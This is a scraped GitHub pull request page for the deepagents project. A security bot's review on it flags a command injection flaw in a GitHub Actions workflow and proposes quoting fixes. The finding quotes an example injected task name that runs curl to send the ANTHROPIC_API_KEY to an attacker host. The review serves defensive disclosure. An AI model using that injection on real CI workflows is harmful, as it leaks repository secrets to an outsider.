Summarization Experiment by maahir30 · Pull Request #2711 · langchain-ai/deepagents

Maahir Sachdev (maahir30) · 2026-04-13T23:58:45Z

based of this: https://papers.cool/arxiv/2512.22087

corridor-security

Security Issues

Command Injection in GitHub Actions workflow
User-controlled input from workflow_dispatch (task_names / task_names_override) is split and directly appended to a shell command without quoting: task_name_flags="$task_name_flags --task-name $task", then expanded unquoted in the uv run invocation. A malicious task name (e.g., containing ;, backticks, or $(...)) can break out of the argument context and execute arbitrary shell commands on the GitHub Actions runner. Since this job loads repository secrets (e.g., ANTHROPIC_API_KEY, OPENROUTER_API_KEY, etc.), an attacker with permission to trigger the workflow could exfiltrate secrets.

`.github/workflows/harbor.yml` (line 390)

Untrusted workflow inputs (task_names / task_names_override) are split and appended to a shell command without quoting, enabling command injection on the Actions runner.

Vulnerable construction:

for task in "${TASKS[@]}"; do
  task=$(echo "$task" | xargs)
  task_name_flags="$task_name_flags --task-name $task"
done
...
uv run harbor run \
  ... \
  $task_name_flags \
  --jobs-dir jobs/terminal-bench \
  ...

An attacker who can trigger this workflow_dispatch could supply a task name like foo; curl https://attacker.tld/x?$ANTHROPIC_API_KEY to execute arbitrary commands and exfiltrate secrets configured for the job.

Remediation options:

Safely quote each dynamic argument when building flags (e.g., using printf '%q').
Prefer Bash arrays for argument construction and expansion: args+=(--task-name "$task") and later uv run ... "${args[@]}".

Minimal single-line fix for the vulnerable line:

              task_name_flags="$task_name_flags --task-name $(printf '%q' "$task")"

For more details, see the finding in Corridor.

Provide feedback: Reply with whether this is a valid vulnerability or false positive to help improve Corridor's accuracy.

codspeed-hq · 2026-04-14T00:47:54Z

Merging this PR will not alter performance

✅ 32 untouched benchmarks
⏩ 15 skipped benchmarks¹

_{Comparing cat-experiment (ba7a620) with main (6e57731)²}

15 benchmarks were skipped, so the baseline results were used instead. If they were deleted from the codebase, click here and archive them to remove them from the performance reports. ↩
No successful run was found on simplify-harbor (eaae7e7) during the generation of this report, so main (6e57731) was used instead as the comparison base. There might be some changes unrelated to this pull request in this report. ↩

Maahir Sachdev (maahir30) added 3 commits April 13, 2026 16:15

simplify

bee15d6

more

eaae7e7

everything

0f0dbfa

Maahir Sachdev (maahir30) requested review from Eugene Yurtsev (eyurtsev), Mason Daugherty (mdrxy) and vivek (vtrivedy) as code owners April 13, 2026 23:58

github-actions Bot added deepagents Related to the `deepagents` SDK / agent harness evals Evaluation suite and Harbor integration github_actions PR touching `.github` internal User is a member of the `langchain-ai` GitHub organization size: M 200-499 LOC labels Apr 13, 2026

Maahir Sachdev (maahir30) changed the base branch from main to simplify-harbor April 13, 2026 23:59

Maahir Sachdev (maahir30) temporarily deployed to evals April 14, 2026 00:00 — with GitHub Actions Inactive

Maahir Sachdev (maahir30) had a problem deploying to evals April 14, 2026 00:01 — with GitHub Actions Error

corridor-security Bot reviewed Apr 14, 2026

View reviewed changes

add all changes

5e3649e

github-actions Bot added the cli Related to `deepagents-cli` label Apr 14, 2026

Maahir Sachdev (maahir30) temporarily deployed to evals April 14, 2026 00:44 — with GitHub Actions Inactive

Maahir Sachdev (maahir30) temporarily deployed to evals April 14, 2026 00:45 — with GitHub Actions Inactive

updates to prompt

ba7a620

Maahir Sachdev (maahir30) temporarily deployed to evals April 14, 2026 01:21 — with GitHub Actions Inactive

Maahir Sachdev (maahir30) temporarily deployed to evals April 14, 2026 01:22 — with GitHub Actions Inactive

Base automatically changed from simplify-harbor to main April 16, 2026 21:31

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Summarization Experiment#2711

Summarization Experiment#2711
Maahir Sachdev (maahir30) wants to merge 5 commits intomainfrom
cat-experiment

Maahir Sachdev (maahir30) commented Apr 13, 2026

Uh oh!

corridor-security Bot left a comment

Uh oh!

codspeed-hq Bot commented Apr 14, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

Maahir Sachdev (maahir30) commented Apr 13, 2026

Uh oh!

corridor-security Bot left a comment

Choose a reason for hiding this comment

.github/workflows/harbor.yml (line 390)

Uh oh!

codspeed-hq Bot commented Apr 14, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Merging this PR will not alter performance

Footnotes

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

`.github/workflows/harbor.yml` (line 390)

codspeed-hq Bot commented Apr 14, 2026 •

edited

Loading